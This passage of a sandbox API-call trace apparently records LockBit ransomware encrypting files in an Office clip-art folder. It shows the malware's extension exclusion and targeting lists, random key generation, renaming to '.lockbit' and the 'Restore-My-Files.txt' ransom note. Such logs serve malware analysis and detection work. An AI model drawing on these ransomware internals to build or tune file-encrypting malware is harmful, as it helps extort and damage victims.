hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.500] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.502] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.502] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.502] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.503] free (_Block=0x1fa2ed8) [0168.504] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02074U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.504] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.504] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.504] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c443600, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4c443600, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02208U.BMP", cAlternateFileName="")) returned 1 [0168.504] lstrcmpiW (lpString1=".", lpString2="PH02208U.BMP") returned -1 [0168.504] lstrcmpiW (lpString1="..", lpString2="PH02208U.BMP") returned -1 [0168.504] PathFindExtensionW (pszPath="PH02208U.BMP") returned=".BMP" [0168.504] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.504] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.504] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.504] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.504] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.504] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.504] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.504] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.504] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.505] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.505] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.506] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.506] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02208U.BMP") returned 1 [0168.506] lstrcmpiW (lpString1="ntldr", lpString2="PH02208U.BMP") returned -1 [0168.506] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02208U.BMP") returned -1 [0168.506] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02208U.BMP") returned -1 [0168.506] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02208U.BMP") returned -1 [0168.506] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02208U.BMP") returned 1 [0168.507] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02208U.BMP") returned -1 [0168.507] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.507] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP") returned=".BMP" [0168.507] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.507] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.507] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.508] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.508] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP.lockbit") returned 72 [0168.508] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02208u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0168.512] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.512] malloc (_Size=0x40068) returned 0x3d70450 [0168.512] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=31968) returned 1 [0168.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.513] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.513] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0168.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0168.514] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0168.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.516] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.516] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0168.517] free (_Block=0x1fa2ed8) [0168.517] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02208U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0168.517] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0168.517] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0168.517] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e0cfa00, ftCreationTime.dwHighDateTime=0x1bd4e52, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e0cfa00, ftLastWriteTime.dwHighDateTime=0x1bd4e52, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02223U.BMP", cAlternateFileName="")) returned 1 [0168.518] lstrcmpiW (lpString1=".", lpString2="PH02223U.BMP") returned -1 [0168.518] lstrcmpiW (lpString1="..", lpString2="PH02223U.BMP") returned -1 [0168.518] PathFindExtensionW (pszPath="PH02223U.BMP") returned=".BMP" [0168.518] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0168.518] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0168.518] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0168.518] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0168.518] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.518] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0168.519] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0168.519] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02223U.BMP") returned 1 [0168.519] lstrcmpiW (lpString1="ntldr", lpString2="PH02223U.BMP") returned -1 [0168.519] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02223U.BMP") returned -1 [0168.519] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02223U.BMP") returned -1 [0168.519] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02223U.BMP") returned -1 [0168.519] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02223U.BMP") returned 1 [0168.520] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02223U.BMP") returned -1 [0168.520] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0168.520] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP") returned=".BMP" [0168.520] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0168.520] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0168.520] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0168.521] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0168.521] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP.lockbit") returned 72 [0168.521] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02223u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0168.522] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0168.522] malloc (_Size=0x40068) returned 0x1ff1e60 [0168.522] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32184) returned 1 [0168.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0168.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0168.523] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.615] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0168.615] malloc (_Size=0xa6) returned 0x1fa2ed8 [0168.615] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.041] free (_Block=0x1fa2ed8) [0169.041] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02223U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.041] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.041] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.041] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30d92b00, ftCreationTime.dwHighDateTime=0x1bd4e54, ftLastAccessTime.dwLowDateTime=0x6ce6f8f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x30d92b00, ftLastWriteTime.dwHighDateTime=0x1bd4e54, nFileSizeHigh=0x0, nFileSizeLow=0x7db8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02291U.BMP", cAlternateFileName="")) returned 1 [0169.041] lstrcmpiW (lpString1=".", lpString2="PH02291U.BMP") returned -1 [0169.041] lstrcmpiW (lpString1="..", lpString2="PH02291U.BMP") returned -1 [0169.041] PathFindExtensionW (pszPath="PH02291U.BMP") returned=".BMP" [0169.041] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.041] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.041] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.042] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.042] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.042] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.042] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.043] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.043] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02291U.BMP") returned 1 [0169.043] lstrcmpiW (lpString1="ntldr", lpString2="PH02291U.BMP") returned -1 [0169.043] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02291U.BMP") returned -1 [0169.043] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02291U.BMP") returned -1 [0169.044] lstrcmpiW 